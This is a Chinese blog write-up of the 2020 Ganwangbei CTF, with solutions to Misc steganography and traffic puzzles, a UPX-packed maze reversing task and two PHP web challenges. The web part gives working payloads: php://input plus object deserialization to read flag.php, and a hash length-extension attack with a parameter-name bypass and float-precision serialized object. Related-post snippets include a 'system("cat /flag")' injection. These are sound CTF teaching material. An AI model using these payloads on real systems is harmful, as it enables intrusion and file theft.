2020第一届赣网杯网络安全大赛(已更新)

最新推荐文章于 2023-03-03 14:06:09 发布
最新推荐文章于 2023-03-03 14:06:09 发布
阅读量4.8k 收藏 32
点赞数 13
分类专栏: 2020第一届赣网杯网络安全大赛 CTF线上赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46481239/article/details/108446288
版权

赛题类型

Misc

CheckIn

看到二维码扫描,关注公众号,回复赣网杯,直接出现flag
在这里插入图片描述

face

下载解压,得到flag.txt,打开一看,是一大串表情字符,一开始联想到js表情包加解密,后来尝试无果

在这里插入图片描述

在github上找到相关文章
在这里插入图片描述
直接对应字符转码
在这里插入图片描述
找到转译网站直接转换成文本
在这里插入图片描述
拿到flag在这里插入图片描述

DestroyJava

解压得到一个mp4文件
在这里插入图片描述
看了一下视频内容,猜测其中藏了什么信息
binwalk查看发现有jpeg图片
在这里插入图片描述
foremost分离
在这里插入图片描述
分离出jpg图片
一开始以为是图片隐写,把jpg图片放进stegsolve等工具查看了通道,都没发现什么信息
于是换个思路,steghide info 发现隐藏文件

在这里插入图片描述
利用网上脚本爆破出密码
在这里插入图片描述
爆破脚本如下
在这里插入图片描述
利用steghide提取出刚刚发现的隐藏文件a.jpg的信息内容,发现base64.txt,查看,发现一串编码,猜测为base85编码,直接利用python base64模块的base85解码,解出flag
在这里插入图片描述

Hidepig

在这里插入图片描述
发现流量的类型为USB,于是找到USB流量分析脚本
在这里插入图片描述
在这里插入图片描述
获得密码:381382770
得到密码之后,进行pdf隐写
打开使用wbStego4open
在这里插入图片描述
输入刚才得到的密码
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
得到flag

Web

EasyPhp

在这里插入图片描述
打开题目直接就给出了源码
源码接受三个参数,$sz_txt读取的文件内容要为”welcome to jxsz”
$sz_file参数会进行正则匹配flag,若匹配,则输出”Not now!”,然后退出
如果没有匹配到flag,则进入include函数
输入的password参数会进行反序列操作然后输出

分析之后
$sz_txt可以通过php://input的伪协议进行读取post进去的值,这样就可以读取到我们任意的字符
题目中注释给出了存在useless.php,我们需要读取出来查看
在这里插入图片描述

<?php  

class Flag{  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("So cool,continue plz");
        }  
    }  
}  
?>

这定义了一个Flag类,其中引入了一个魔术方法__tostring,如果存在$flag,则包含并输出其中的内容
在这里插入图片描述
运行之后得到O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
所以构造出最终payload
在这里插入图片描述
在这里插入图片描述
得到flag

parseHash

此题为国赛原题easytrick改的,考查的是hash拓展攻击 + php非法表单名传参 + php浮点数高精度绕过

因为比赛环境关闭了,所以自己搭了一个,改了key值:

<?php 
include("key.php");
class person{ 
    public $aa; 
    public $bb; 
    public $username; 
    public $password; 
    public function __construct($key=''){ 
        $this->username="jxsz";
        $this->password="jxsz";
        if(strlen($key)==16&&md5($key . urldecode( $this->username .  $this->password)=="
            1f19fc53484d729ca7c3f44fe37115f6")){
            echo "Welcome";
        }  
    } 

    public function __destruct(){ 
        $this->aa = (string)$this->aa; 
        if(strlen($this->aa) > 5 || strlen($this->bb) > 5||preg_match('/INF|NAN|M_/i', $this->aa)){ 
            die("no no no"); 
        } 
        if($this->aa !== $this->bb && md5($this->aa) === md5($this->bb) && $this->aa != $this->bb){ 
            echo file_get_contents("flag"); 
        } 
    } 
} 
highlight_file(__FILE__); 
$person=new person($key);
$other_pwd=$_POST["pwd1"];
$other_hash=$_POST["hash_code"];
if(md5($key . urldecode("jxsz" . $other_pwd))==$other_hash&&strpos(urldecode($other_pwd),"szxy666")>0){
    echo "66666666666";
    unserialize($_GET['sz_sz.sz']);
}

hash拓展攻击部分

$this->username = "jxsz"
$this->password = "jxsz"
strlen($key)==16
md5($key.urldecode($this->username.$this->password)) = " "
strlen($key) + strlen("jxsz") = 20

最后一个条件: 传入字符串中需要有“szxy666”字符,并且不能放在开头
我们可以使用hashpump进行长度拓展
hashpump工具地址:https://github.com/bwall/HashPump
在这里插入图片描述
将拓展后的编码urlencode一下,用%代替\x

jxsz%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00szxy666

635c8ebe4aadeed473a16c197e01fa2e

拼接一下payload:

pwd1=jxsz%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00szxy666&hash_code=635c8ebe4aadeed473a16c197e01fa2e

执行
在这里插入图片描述
一开始抓到的是get包,换成post再传,go一下成功回显
php非法表单名传参
反序列化GET参数名中包含了非法字符. 会进行过滤

 unserialize($_GET['sz_sz.sz'])

通过php对非法传参名的处理机制,我们可以了解到处理非法字符.的过程中只替换一次

在这里插入图片描述
所以为了防止变量名’sz_sz.sz’中的.被替换成_,我们用 [ 代替_去执行,这样替换一次后,后面的 . 就不会过滤掉
所以前部分payload:?sz[sz.sz=

php浮点数高精度绕过
在这里插入图片描述
这里过滤了NAN和INF,利用高精度浮点数绕过
序列化poc:

<?php 
class person{ 
    public $aa; 
    public $bb;
 }
$res = new person();
$res->aa = 0.8 * 7;
$res->bb = 7 * 0.8;
echo serialize($res);
?>

在这里插入图片描述

O:6:"person":2:{s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}

拼接:

?sz[sz.sz=O:6:”person":2:{s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}

测试
在这里插入图片描述
出现flag
flag{hashparse+sz_sz.sz}

Reverse

maze

ida打开很奇怪,猜测有壳
exeinfope查壳发现是upx

工具脱壳后程序好像IAT表出现问题打不开

直接静态分析吧,上下左右对应WSAD

要求输入字符长度为48

迷宫一行30个,起点是坐标[1,1],终点是数据为2的坐标

数据如下:

0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,0,0,0,1,0,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,1,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,1,1,0,0,0,0,1,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,1,1,0,0,0,0,0,0,1,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,1,0,1,1,0,0,0,1,1,1,1,1,0,1,0,1,1,1,1,1,1,1,0,0,
0,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,1,1,0,1,1,1,0,0,0,0,0,1,0,0,
0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,1,2,0,

最后flag为:flag{DSSSDDSDSDDDDDWDDSDSSDDDDWDDSSDDWDDDDDDSSD}

F10NAF11pp3d
关注
  • 13
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 18
    评论
专栏目录
2021第一届网刃杯网络安全大赛.zip
09-13
2021第一届网刃杯网络安全大赛.zip
2021网杯网络安全大赛_部分Writeup
热门推荐
Keepb1ue的博客
12-07 1万+
Web 1.checkin 这种游戏类题目,一般都是用js去做控制结果 直接查看网页源码点到http://118.31.60.233:10000/js/game.js Ctrl+F直接搜flag flag{134791e2-d93c-4d01-a71f-dcbe82d7fe08} 2.gwb-web-easypop <?php error_reporting(0); highlight_file(__FILE__); $pwd=getcwd(); class func { pu
网杯2022初赛misc1
wha1e的博客
12-10 463
网杯2022初赛misc1
[第二届网杯]部分wp
Huamang的博客
12-06 1826
第二届网杯
2022——网杯MISC题目来学习volatility
小菜猴子_x
03-03 378
2022——网杯MISC题目来学习volatility
第二届网杯WEB第一题WP
冰封 战戟
04-27 1771
第二届网杯WEB第一题WP
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络...
2022第二届网刃杯网络安全大赛题包
09-19
2022第二届网刃杯网络安全大赛题包 2022第二届网刃杯网络安全大赛题包 2022第二届网刃杯网络安全大赛题包 2022第二届网刃杯网络安全大赛题包 2022第二届网刃杯网络安全大赛题包 2022第二届网刃杯网络安全大赛题包 ...
2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯”网络...
2021第一届网刃杯网络安全大赛题包
09-20
2021第一届网刃杯网络安全大赛题包 2021第一届网刃杯网络安全大赛题包 2021第一届网刃杯网络安全大赛题包 2021第一届网刃杯网络安全大赛题包 2021第一届网刃杯网络安全大赛题包 2021第一届网刃杯网络安全大赛题包 ...
第一届网杯网络安全大赛 2020GW-CTF Web_Writeup
末初的CSDN博客
09-08 3969
赛题类型WebEasyPhpparseHashMisc签到CheckinfaceDestroyJavaHidepig Web EasyPhp <?php $sz_txt = $_GET["sz_txt"]; $sz_file = $_GET["sz_file"]; $password = $_GET["password"]; if(isset($sz_txt)&&(file_get_contents($sz_txt,'r')==="welcome to jxsz")){
第一届网杯网络安全大赛 2020GW-CTF Misc_Writeup
末初的CSDN博客
11-07 2332
目录签到CheckinfaceDestroyJavaHidepig 签到Checkin flag{welc0me_to_ganwangbei} face Lennyfuck interpreter https://github.com/Knorax/Lennyfuck_interpreter 跟着对照表替换即可 ++++++++++[->++++++++++<]>++.++++++.<+++[->---<]>--.++++++.<++++[->
第一届网杯网络安全大赛[parseHash]
Keepb1ue的博客
09-12 2890
打了个酱油。 记录下一些web题,杂项和其他赛题网上也挺多的。 由于打完没直接写,现在靶场也关了,无法逆推,所以自己修改了key值重新改了下hash。题目还是一样。 源码: <?php include("key.php"); class person{ public $aa; public $bb; public $username; public $password; public function __construct($key=''){
2020第四届“强网杯“全国网络安全挑战赛】强网先锋 Funhash
weixin_45844670的博客
08-24 1144
题目链接:http://39.101.177.96/ <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { die('level 1 failed'); } //level 2 if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5(
2021年第二届网杯网络安全大赛MISC-Writeup
末初的CSDN博客
12-06 7097
文章目录decodemastergwb-misc-lovemathgwb-misc3-testcat decodemaster decodemaster.docx的内容是wingding编码:https://lingojam.com/WingDing Sllv we GMT gje dsh vc sim gzwspio! EHRw tfk koa sq om reocxeua lzdpuil. W rkwa xsg tqiewtc pb wznjurz o vwspmnwzmvem jegbmnwz
2020年9月“网杯”hidepig流量分析题writeup
gclome的博客
09-08 563
练了几天的流量题,终于迎来了比赛! 虽然这次流量题有个点卡住了,但是后来还是做出来了! 文件下载后,发现很多usb流量,然后Leftover Capture Data域中,数据长度为八个字节,说明是键盘流量,利用tshark提取出来数据 tshark -r pig2.pcapng -T fields -e usb.capdata > usbdata.txt 提取出来之后,使用notepad++去除空行 然后运行脚本 normalKeys = {"04":"a", "05":"b", "06":"c"
2020上海大学生网络安全赛MISC题WP
qwzf
11-15 1657
上海大学生网络安全赛MISC题WP前言MISC 可乐加冰MISC pcap analysisMISC pcapMISC 签到 前言 昨天参加了上海大学生网络安全赛,MISC题全部AK,Web题就做出一道。我果然够菜,都不好意思说自己是学Web的。 最让我记忆尤新的是我竟然拿了MISC 可乐加冰的一血,学PWN的队友chumen77也拿了一个PWN题的一血(可能是大师傅们都去打湖湘线下和西湖线下的原因)。最后还剩10分钟左右时,还在前20名。最后10分钟连掉了7、8个名次,最终应该去不了线下了,我们真菜。。。
迷宫路线寻找算法的matlab仿真
FPGA/MATLAB学习教程/源码/项目合作开发
03-09 4366
1.问题描述: 迷宫创建算法和迷宫路径寻找算法 2.部分程序: % Clean up. clc; close all; clear all; fontSize = 20; % Font size for image captions. % Change the current folder to the folder of this m-file. % (The line of code below is from Brett Shoelson of The Mathworks.) if(~...
2021网杯web和misc部分wp
qq_48511129的博客
12-08 1774
web checkin flag{134791e2-d93c-4d01-a71f-dcbe82d7fe08} gwb-web-easypop 利用这个create_function函数闭合前面括号进行代码执行echo 2;}system(“cat /flag”);// exp <?php error_reporting(0); $pwd=getcwd(); class func { public $mod1; public $mod2; public $key; } class
第三届上海市大学生网络安全大赛
最新发布
07-30
回答: 第三届上海市大学生网络安全大赛是一个网络安全竞赛活动。根据提供的引用内容,我们可以得知比赛中使用了多种协议,包括ARP、DNS、FTP、FTP-DATA、ICMP、ICMPv6、IGMPv3、LLMNR、NBNS、SSDP、SSL、TCP、TLSv1.2和UDP。[1]参考链接提供了一些关于比赛的详细信息,包括解题思路和题目链接。[2]根据引用[3]中的描述,参赛者需要按照协议类型对数据包进行读取,并注意到只有FTP协议是被使用的,同时TLS协议进行了加密。通过使用wireshark的过滤器,可以筛选出FTP和FTP-DATA的数据包。在数据包中发现了FTP的用户名和密码,但尝试登录时发现无法成功登录。提供的服务器地址是182.254.217.142,用户名是ftp,密码是codingay。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 18
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值